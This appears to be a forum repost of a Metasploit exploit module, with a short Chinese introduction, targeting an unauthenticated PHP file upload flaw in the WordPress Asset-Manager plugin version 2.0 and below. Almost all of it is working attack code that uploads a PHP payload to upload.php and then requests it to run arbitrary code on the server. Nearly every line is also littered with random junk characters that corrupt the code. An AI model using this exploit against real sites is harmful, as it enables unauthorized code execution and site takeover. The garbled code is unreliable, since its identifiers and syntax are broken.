这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
1 a$ e+ M6 Z& [, L5 N0 Q
; C+ t# b1 N/ O( ?/ g/ Q, L! s% ^##$ A+ H3 B4 l; d6 J
# This file is part of the Metasploit Framework and may be subject to
# g+ E$ V. l& v' k* Z6 b, Q% [3 X9 ~# redistribution and commercial restrictions. Please see the Metasploit$ S" x* K* F$ p/ ~ N9 F
# Framework web site for more information on licensing and terms of use.
* l9 g$ y; F5 z6 b# http://metasploit.com/framework/
( n w* g& j! D% x! F##
; y+ z; c' T; H
& ~3 n# u0 B- c. k5 J; c+ krequire 'msf/core'
! O$ n0 {# I+ F* d. d. v# Lrequire 'msf/core/exploit/php_exe'/ e( M9 I0 W9 x6 A7 h
1 X; Z0 I7 V% {7 T! j" nclass Metasploit3 < Msf::Exploit::Remote, {+ g. _# U- L' \
Rank = ExcellentRanking
2 m/ H& _3 ]& ?7 |/ B+ R- p/ W
$ U. u6 V0 B) h9 e D% O include Msf::Exploit::Remote::HttpClient$ w+ q' J$ s# Y" ?
include Msf::Exploit:hpEXE1 z* `. H0 I* R
" V7 M8 ?7 V9 D def initialize(info = {}). K+ u' G' T6 ^5 v$ u4 P' J
super(update_info(info,
( G4 H: v- r6 f+ S8 |0 a 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
0 v9 Z) X r: i4 S [3 B% a, i 'Description' => %q{
; B7 z7 p, o) |* A8 G This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
$ Y- C: _6 i- S$ d1 x/ {0 o, h plugin. By abusing the upload.php file, a malicious user can upload a file to a; W; W6 p7 P; d
temp directory without authentication, which results in arbitrary code execution. g, E$ x3 a" w7 _5 F6 L
},* C3 l( C, Y; ?" ~9 c8 s
'Author' =>; ^- a+ k9 P3 K" l5 [+ ?7 T+ ~9 J
[' X( ~% u3 R' d) q
'Sammy FORGIT', # initial discovery
% N1 F. I0 I( X! s 'James Fitts <fitts.james[at]gmail.com>' # metasploit module
8 R/ _6 _4 H0 |/ B" h, L" g ],
( }6 T! O7 z' w2 ~ 'License' => MSF_LICENSE,# F1 e, S* O+ T
'References' =>( n2 [/ l% f9 k* ^
[
9 C! ~1 D' k7 j0 a% _ [ 'OSVDB', '82653' ],
! Z. `3 w( O# G. ]' R% w" W2 r& S [ 'BID', '53809' ],
+ J7 I% @. c. ]: ~ [ 'EDB', '18993' ],
6 V3 z( C, G7 A' _$ p9 D [ 'URL', 'http:// www.myhack58.com /' ]1 t3 `# p0 W1 x+ r
],- v, f! R' @' @* Z: B0 P
'Payload' =>
' l8 ]/ f! L! ]7 ]+ V/ e {
) L/ u/ ?' X" B- e- Y 'BadChars' => "\x00",# G F* q/ x8 E! ~- `9 H3 b0 ?% G G
},
3 t% b0 Z& k3 ~ 'Platform' => 'php',3 f* e9 Y2 F+ f/ j( ?# \
'Arch' => ARCH_PHP,7 T6 T2 X2 [2 l
'Targets' =>
# P! S+ G2 N/ \- f [
% S, h: s/ B* h8 M+ \ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
- r& A7 P& \2 y3 y1 I [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
% v! ~7 J7 K0 d$ }! H% U, J) ^/ \ ],
* _! F- `, t( ~# j 'DefaultTarget' => 0,4 U* [* |: r8 |( t! \3 R4 W7 S: D
'DisclosureDate' => 'May 26 2012'))5 H" ^* J1 g) ~+ p
, K2 ^/ e Q) G" t! W register_options(
* j) X# |, i2 r [
. @/ e, p% n; e* Y9 {& F2 S OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
+ K2 v( x/ r5 q2 C ], self.class)
; V4 ~ c7 B$ C" ?% ]; x end
+ b6 r; x. i# a" {" R: A% q/ v
. F4 M* t2 D! o+ V3 T/ F def exploit
1 P9 u7 U& z1 s( m/ l# u: E: O uri = target_uri.path
: t6 b6 G' D' E uri << '/' if uri[-1,1] != '/'
6 E; u: l& p1 [* C! R) q peer = "#{rhost}:#{rport}"' K `: R" y3 p( C
payload_name = "#{rand_text_alpha(5)}.php"9 c- _& O1 H8 D
php_payload = get_write_exec_payload(:unlink_self=>true)# @9 ]" T4 E; S; {) _" E: c3 v
: J. i8 a8 ^' H0 |, |; n$ ~ data = Rex::MIME::Message.new
) p* E: W* H( x: _4 \ data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
! m3 i) T* ]8 ]' M. G post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')% X9 F, o; v5 d
: L: U5 e. S7 ]" j3 L print_status("#{peer} - Uploading payload #{payload_name}")
; \8 f: r- w( W: ] res = send_request_cgi({
. _+ h1 V9 I0 M% K0 ^ 'method' => 'POST',$ e& @$ h+ x& C+ D4 |& u
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",( o0 n1 T+ m2 V" d' b4 F B+ Z
'ctype' => "multipart/form-data; boundary=#{data.bound}",0 e% [2 M- ^# s3 h( O
'data' => post_data* q" o. D' O8 k! e8 D* z
})
+ i2 A5 U( r4 r
# p4 A, G+ j3 m if not res or res.code != 200 or res.body !~ /#{payload_name}/
8 l5 V/ F3 L _- l fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")* {0 P5 m8 e, ^2 Q. i3 P
end
9 Z- D1 [7 [$ [- H2 U1 [/ O
2 N3 c8 K6 _& X; Q+ y; R+ _ print_status("#{peer} - Executing payload #{payload_name}")" v5 _2 z9 g P/ @
res = send_request_raw({
* N( _9 D+ Z9 c$ G' |% e' k 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}", g3 P* ?+ K' l; E A
'method' => 'GET'
/ t+ `# O0 r/ E2 u! A: H! V* w+ @( C- z }) ]( G' |# h$ v" Y+ ?
3 E. N7 O) W5 P& k6 p0 I if res and res.code != 200
% s h- w+ w; h5 P) b* {, X fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")7 s6 a9 p3 U% {3 }% V$ l, e: K
end* O, W; D) [( ^: s
end; B0 w% S8 {7 x8 w' N7 M( I9 f
end2 Z4 y' x! C$ N3 X. q( }
|